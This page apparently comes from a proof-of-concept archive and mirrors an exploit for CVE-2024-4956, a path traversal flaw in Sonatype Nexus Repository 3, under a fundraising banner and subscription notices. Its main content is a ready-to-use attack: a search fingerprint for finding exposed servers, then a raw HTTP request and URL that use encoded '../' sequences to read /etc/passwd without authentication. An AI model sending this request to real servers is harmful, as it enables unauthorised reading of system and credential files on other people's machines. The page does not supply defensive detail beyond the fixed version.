Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-4956 PoC — Nexus Repository 3 - Path Traversal

Source
Associated Vulnerability
Title:Nexus Repository 3 - Path Traversal (CVE-2024-4956)
Description:Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.
Readme
`title="Nexus Repository Manager"`

GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

http://x.x.x.x/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

![image](https://github.com/thinhap/CVE-2024-4956-PoC/assets/104897146/21a30cd6-aca3-4b13-9fda-1f4c1c518567)
File Snapshot

[4.0K] /data/pocs/78cd6e1c0aa3b9f5834c76627bc42c87aae14922 └── [ 472] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →